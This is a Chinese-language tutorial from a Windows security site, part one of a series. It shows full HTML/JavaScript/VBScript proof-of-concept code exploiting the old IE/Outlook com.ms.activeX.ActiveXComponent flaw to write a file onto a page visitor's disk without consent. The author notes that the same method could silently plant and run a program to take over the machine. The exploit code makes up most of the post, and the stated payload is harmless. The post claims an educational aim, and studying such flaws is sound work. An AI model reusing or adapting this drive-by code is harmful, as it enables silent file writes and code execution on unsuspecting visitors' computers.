隐藏在网页中的程序(上)
隐藏在网页中的程序(上)
By 阿权@cners.com
隐藏在网页中的程序,微软的IE/Outlook4.X-5.X浏览器有一个com.ms.activeX.ActiveXComponent漏洞,可以使一个恶意程序在访问者浏览网页时加载并下载到访问者电脑,并执行。本文给大家一个例子,要大家知道我们平时上网多么危险。本程序将在您的桌面上建立一个叫CNers.COM.HTM的文件:
<HTML>
<HEAD>
<TITLE>
Demo #2 - IE 5.5/Outlook安全漏洞- com.ms.activeX.ActiveXComponent 允许执行任意程序
</TITLE>
</HEAD>
<BODY>
<BR>
<APPLET code="com.ms.activeX.ActiveXComponent" >
</APPLET>
<!-- ^^^ This gives java exceptions in java console, but the object is instantiated -->
<SCRIPT LANGUAGE="JAVASCRIPT">
a1=document.applets[0];
fn="CNers.COM.HTM";
doc="<SCRIPT>s1=\'欢迎你访问视窗安全!\\请您将在启动文件夹内的CNers.COM.HTM删除即可\';alert(s1);document.body.innerHTML=s1</"+"SCRIPT>";
function f1()
{
a1.setProperty('DOC',doc);
}
function f()
{
// The ActiveX classid
cl="{06290BD5-48AA-11D2-8432-006008C3FBFC}";
a1.setCLSID(cl);
a1.createInstance();
setTimeout("a1.setProperty('Path','"+fn+"')",1000);
setTimeout("f1()",1500);
setTimeout("a1.invoke('write',VA);alert('"+fn+" 被建立');",2000);
}
setTimeout("f()",1000)
</SCRIPT>
<SCRIPT LANGUAGE="VBSCRIPT">
VA = ARRAY()
' 获取com.ms.com.Variant[]
</SCRIPT>
<BR>
</BODY>
</HTML>
--------------------------------------------------------------------------------
这样,我们在您的桌面上建立了文件,并写入启动组。当然我们可以写一个64KB的程序,并让你在没有被警告的情况下执行,从而控制您的电脑。
下集将告诉您如何实现在网页执行程序。
此教程仅用于教育目的,我们没有安装恶意程序。
如要转载请注明出处和以上信息,视窗安全 www.cners.com